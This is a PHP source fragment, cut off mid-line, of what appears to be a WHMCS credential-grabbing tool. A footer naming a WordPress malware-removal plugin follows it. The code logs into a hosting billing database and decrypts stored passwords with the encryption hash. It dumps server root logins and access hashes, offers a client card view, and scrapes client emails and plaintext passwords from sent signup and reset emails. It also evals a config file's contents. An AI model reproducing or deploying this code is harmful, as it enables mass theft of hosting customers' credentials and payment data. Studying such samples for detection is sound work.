        global $cc_encryption_hash;
        $qq = $_GET["qq"];
        $q = str_replace(" ", "%", $_POST["q"]);
        if ($qq != "") {
            $q = $qq;
        }
        if ($q == "") {
            $q = "%";
        }
        if ($qq == "") {
            $qq = $q;
        }
        $query = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM {$table}  LIMIT  0,5");
        if (!is_array(mysqli_fetch_array($query))) {
            echo "<h1>{$name}</h1><p class=\"msg error\">Nothing Found !</p>";
        } else {
            echo "<center><h1>{$name}</h1> <br>";
            if ($export == 1) {
                echo "<form action=\"?p={$p}\" name=\"formw\" method=\"post\"> \r\n\r\n<input name=\"export\" type=\"hidden\" value=\"1\"> \r\n<center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[Save to TXT file ]\" /></form></center><br>";
            }
            echo "<center><h3  class=\"tit\">Search</h3><FORM action=\"?p={$p}\"  method=\"post\"> \r\n\r\n<input type=\"text\" name=\"q\" value=\"{$q}\"> \r\n<br> \r\n<INPUT class=\"input-submit\"  type=\"submit\" value=\"Submit\" name=\"Submit\"> \r\n</form>";
            if (isset($_GET["page"])) {
                $page = intval($_GET["page"]);
            } else {
                $page = 1;
            }
            if (is_array($where)) {
                $where2 = "'0";
                foreach ($where as $w) {
                    $where2 .= "' or {$w} LIKE '%{$q}%";
                }
                $where2 .= "'";
            } else {
                $where2 = $where;
            }
            $start_from = ($page - 1) * 100;
            $query = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM {$table} where {$if} ({$where2}) order by {$order} LIMIT {$start_from} , 100 ");
            $total_records = mysqli_num_rows(mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM {$table} where {$if} ({$where2}) order by {$order}"));
            echo "<h3  class=\"tit\">Total Records " . $total_records . "</h3><br>";
            $total_pages = ceil($total_records / 100);
            echo "<br><table border='0'><tr>";
            echo "<th>Page " . $page . " Of " . $total_pages . "</th>";
            if ($page > 1) {
                echo "<td><a href='?p={$p}&qq=" . $qq . "&page=" . ($page - 1) . "'>Back</a>&nbsp</td>";
            }
            echo "<td><a href='?p={$p}&qq=" . $qq . "&page=" . $total_pages . "'>Latest</a></td>";
            if ($page < $total_pages) {
                echo "<td>&nbsp<a href='?p={$p}&qq=" . $qq . "&page=" . ($page + 1) . "'>Next</a>&nbsp</td>";
            }
            for ($i = 0; $i <= $total_pages; $i++) {
                if ($i % 2 == 0) {
                    $bg2 = "class=\"bg2\"";
                } else {
                    $bg2 = "";
                }
                if ($i % 20 == 0) {
                    echo "";
                }
                if ($i == 0) {
                    echo "<td>&nbsp&nbsp</td>";
                } else {
                    if ($i == $page) {
                        echo "<td {$bg2}>&nbsp<a href='?p={$p}&qq=" . $qq . "&page=" . $i . "'>(" . $i . ")</a>&nbsp</td>";
                    } else {
                        echo "<td {$bg2}>&nbsp<a href='?p={$p}&qq=" . $qq . "&page=" . $i . "'>" . $i . "</a>&nbsp</td>";
                    }
                }
            }
            echo "</tr></table>";
            if (!is_array(mysqli_fetch_array($query))) {
                echo "<p class=\"msg error\">Nothing Found !</p>";
                exit;
            }
            echo "<br><table ><tr>";
            foreach ($col as $col1) {
                echo "<th>{$col1}</th>";
            }
            echo " </tr>";
            $query = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM {$table} where {$if} ({$where2}) order by {$order} LIMIT {$start_from} , 100 ");
            $ii = 0;
            while ($v = mysqli_fetch_array($query)) {
                if ($ii % 2 == 0) {
                    $bg = "class=\"bg\"";
                } else {
                    $bg = "";
                }
                echo "<tr {$bg} >";
                foreach ($sql as $sql1) {
                    if ($sql1 == "password") {
                        echo "<td>" . decrypt($v["password"], $cc_encryption_hash) . "</td>";
                    } elseif ($sql1 == "userid" or $table = "tblclients" and $sql1 == "id") {
                        echo "<td " . $v[$sql1] . "'>" . $v[$sql1] . "</td>";
                    } else {
                        echo "<td>" . $v[$sql1] . "</td>";
                    }
                }
                echo "</tr>";
                $ii++;
            }
            echo "</table>";
        }
    }
    function table($sql, $col)
    {
        global $cc_encryption_hash;
        $q = mysqli_query($GLOBALS["___mysqli_ston"], $sql);
        if (!is_array(@mysqli_fetch_array($q))) {
            echo "<p class=\"msg error\">Nothing Found !</p>";
            return;
        }
        $q = mysqli_query($GLOBALS["___mysqli_ston"], $sql);
        echo "<br><table border='0'>";
        echo "<tr>";
        foreach ($col as $sql1) {
            echo "<th>" . ucfirst($sql1) . "</th>";
        }
        echo "</tr>";
        $ii = 0;
        while ($v = mysqli_fetch_array($q)) {
            if ($ii % 2 == 0) {
                $bg = "class=\"bg\"";
            } else {
                $bg = "";
            }
            echo "<tr {$bg} >";
            foreach ($col as $sql1) {
                if ($sql1 == "password") {
                    echo "<td>" . decrypt($v["password"], $cc_encryption_hash) . "</td>";
                } elseif ($sql1 == "userid" or $table = "tblclients" and $sql1 == "id") {
                    echo "<td> <a href='?p=12&id=" . $v[$sql1] . "'>" . $v[$sql1] . "</a></td>";
                } else {
                    echo "<td>" . $v[$sql1] . "</td>";
                }
            }
            echo "</tr>";
            $ii++;
        }
        echo "</table><br>";
    }
    @set_time_limit(0);
    ob_start();
    if ($auth == 1) {
        if (!isset($_SERVER["PHP_AUTH_USER"]) || md5($_SERVER["PHP_AUTH_USER"]) !== $user || md5($_SERVER["PHP_AUTH_PW"]) !== $pass) {
            header("WWW-Authenticate: Basic realm=''");
            header("HTTP/1.0 401 Unauthorized");
            exit("Go To Hell");
        }
    }
    $p = $_GET["p"];
    if ($_POST["form_action"] == 1) {
        setcookie("db_host", $_POST["db_host"]);
        setcookie("db_username", $_POST["db_username"]);
        setcookie("db_password", $_POST["db_password"]);
        setcookie("db_name", $_POST["db_name"]);
        setcookie("login", "1");
        setcookie("cc_encryption_hash", $_POST["cc_encryption_hash"]);
        $c = @($GLOBALS["___mysqli_ston"] = mysqli_connect($_POST["db_host"], $_POST["db_username"], $_POST["db_password"]));
        $c2 = @mysqli_select_db($c, $_POST["db_name"]);
        if ($c and $c2) {
            echo "<center><p class=\"msg done\">Done : Connection Successfully      </p></center>";
            echo "<meta http-equiv='refresh' content='1;url=?p=1' />";
        } else {
            echo "<p class=\"msg error\">Database error</p>";
        }
    }
    if ($_POST["form_action"] == 2) {
        $file = $_POST["file"];
        $text = file_get_contents($file);
        $text = str_replace("<?php", "", $text);
        $text = str_replace("<?php ", "", $text);
        $text = str_replace("?>", "", $text);
        eval($text);
        setcookie("db_host", $db_host);
        setcookie("db_username", $db_username);
        setcookie("db_password", $db_password);
        setcookie("db_name", $db_name);
        setcookie("login", "1");
        setcookie("cc_encryption_hash", $cc_encryption_hash);
        $c = @($GLOBALS["___mysqli_ston"] = mysqli_connect($db_host, $db_username, $db_password));
        $c2 = mysqli_select_db($c, $db_name);
        if ($c and $c2) {
            echo "<center><p class=\"msg done\">Done : Connection Successfully      </p></center>";
            echo "<meta http-equiv='refresh' content='1; \r\nURL=?p=1' />";
        } else {
            echo "<p class=\"msg error\">Database error</p>";
        }
    }
    if ($_POST["form_action"] == 3) {
        $key = $_POST["key"];
        $key = explode("-", $key);
        $v = explode("|", base64_decode($key[1]));
        setcookie("db_host", base64_decode($v[0]));
        setcookie("db_username", base64_decode($v[1]));
        setcookie("db_password", base64_decode($v[2]));
        setcookie("db_name", base64_decode($v[3]));
        setcookie("login", "1");
        setcookie("cc_encryption_hash", base64_decode($v[4]));
        $c = @($GLOBALS["___mysqli_ston"] = mysqli_connect(base64_decode($v[0]), base64_decode($v[1]), base64_decode($v[2])));
        $c2 = @mysqli_select_db($c, constant('base64_decode($v[3])'));
        if ($c and $c2) {
            echo "<center><p class=\"msg done\">Done : Connection Successfully      </p></center>";
            echo "<meta http-equiv='refresh' content='1; \r\nURL=?p=1' />";
        } else {
            echo "<p class=\"msg error\">Database error</p>";
        }
        echo "<meta http-equiv='refresh' content='1; \r\nURL=?p=1' />";
    }
    if ($_COOKIE["login"] == "1") {
        $db_host = $_COOKIE["db_host"];
        $db_username = $_COOKIE["db_username"];
        $db_password = $_COOKIE["db_password"];
        $db_name = $_COOKIE["db_name"];
        $cc_encryption_hash = $_COOKIE["cc_encryption_hash"];
        $link = @($GLOBALS["___mysqli_ston"] = mysqli_connect($db_host, $db_username, $db_password));
        mysqli_select_db($link, $db_name);
    }
    if ($p and $_COOKIE["login"] != "1") {
        header2();
        login();
        exit;
    }
    if ($_COOKIE["login"] != "1") {
        header2();
        login();
        exit;
    }
    $db_host = $_COOKIE["db_host"];
    $db_username = $_COOKIE["db_username"];
    $db_password = $_COOKIE["db_password"];
    $db_name = $_COOKIE["db_name"];
    $cc_encryption_hash = $_COOKIE["cc_encryption_hash"];
    $link = @($GLOBALS["___mysqli_ston"] = mysqli_connect($db_host, $db_username, $db_password));
    mysqli_select_db($link, $db_name);
    if (!$link) {
        echo "<h1>Database error</h1>";
        header1();
        login();
        exit;
    }
    if ($p) {
        header1();
    }
    switch ($p) {
        case "m":
            echo " \r\n\r\n<table><tr><td> \r\n<a href=\"?p=h\" target=\"frame1\"> Home</a></td></tr><tr><td> \r\n<a href=\"?p=1\" target=\"frame1\">Server R00t</a></td></tr><tr><td> \r\n<a href=\"?p=2\" target=\"frame1\">Domains Resellers</a></td></tr><tr><td> \r\n<a href=\"?p=3\" target=\"frame1\">Clients R00ts</a></td></tr><tr><td> \r\n<a href=\"?p=4\" target=\"frame1\">Clients Hosting Accounts</a></td></tr><tr><td> \r\n<a href=\"?p=5\" target=\"frame1\">Clients CC</a></td></tr><tr><td> \r\n<a href=\"?p=100\" target=\"frame1\">Clients list</a></td></tr><tr><td> \r\n<a href=\"?p=105\" target=\"frame1\">Clients Password</a></td></tr><tr><td> \r\n<a href=\"?p=9\" target=\"_parent\"> Logout</a></td></tr></table>";
            break;
        case "h":
            login();
            exit;
        case 105:
            echo "<h1>Clients Password</h1><center>";
            $query0 = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM tblemailtemplates where name='Client Signup Email' or name='Password Reset Confirmation'");
            while ($v0 = mysqli_fetch_array($query0)) {
                $t = $v0["subject"];
                $t = trim(str_replace("{\$company_name}", "", $t));
                $c = $v0["message"];
                $c = explode(" \r\n", $c);
                $r = "";
                for ($i = 0; $i < count($c); $i++) {
                    if (strpos($c[$i], "{\$client_password}") > 0) {
                        $r .= $c[$i];
                    } elseif (strpos($c[$i], "{\$client_email}") > 0) {
                        $r .= $c[$i];
                    }
                }
                $r = preg_quote($r);
                $r = str_replace("\\{\\\$client_email\\}", "(.*)", $r);
                $r = str_replace("\\{\\\$client_password\\}", "(.*)", $r);
                $r = str_replace("\\{\\{$whmcs_link}\\}", "(.*)", $r);
                $r = str_replace("\\{\\\$signature\\}", "(.*)", $r);
                $r = str_replace("\\{\\\$client_name\\}", "(.*)", $r);
                $r = str_replace(" \r\n", "", $r);
                $r = str_replace(" \r\n", "", $r);
                $query = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT message,userid FROM tblemails where subject like '%" . $t . "%'");
                while ($v = mysqli_fetch_array($query)) {
                    $mail = $v["message"];
                    $mail = str_replace(" \r\n", "", $mail);
                    $mail = str_replace(" \r\n", "", $mail);
                    $reg = "|(.*){$r}(.*)|isU";
                    $a = array();
                    preg_match_all($reg, $mail, $a);
                    for ($i = 1; $i < count($a); $i++) {
                        if (eregi("^[_\\.0-9a-z-]+@([0-9a-z-]+\\.)+[a-z]{2,10}\$", $a[$i][0])) {
                            $list[$v["userid"]]["mail"][] = $a[$i][0];
                            $list[$v["userid"]]["pass"][] = $a[$i + 1][0];
                        }
                    }
                }
            }
            echo "<h3  class=\"tit\">Total Records " . (count($list) - 1) . "</h3>";
            echo "<table border='1'>";
            foreach ($list as $x => $y) {
                echo "<tr><td><a href='?p=12&id={$x}'>{$x}</a></td><td>" . implode("<br>", $y["mail"]) . "</td><td>" . implode("<br>", $y["pass"]) . "</td></tr>";
            }
            echo "</table>";
            break;
        case 1:
            $query = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM tblservers");
            if (!is_array(mysqli_fetch_array($query))) {
                echo "<h1>Server R00t</h1><p class=\"msg error\">Nothing Found !</p>";
            } else {
                echo "<center><h1>Server R00t</h1><center><br><form action=\"?p=1\" name=\"formw\" method=\"post\"> \r\n\r\n<input name=\"export\" type=\"hidden\" value=\"1\"> \r\n<center><input type=\"submit\" name=\"submit2\" class=\"input-submit\" value=\"[Save to TXT file ]\" /></center><br>";
                table("SELECT * FROM tblservers", array("type", "active", "hostname", "ipaddress", "username", "password", "accesshash"));
            }
            $query = mysqli_query($GLOBALS["___mysqli_ston"], "SELECT * FROM tblservers");
            $toast .= " \r\n\r\n";
            while ($v = mysq


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.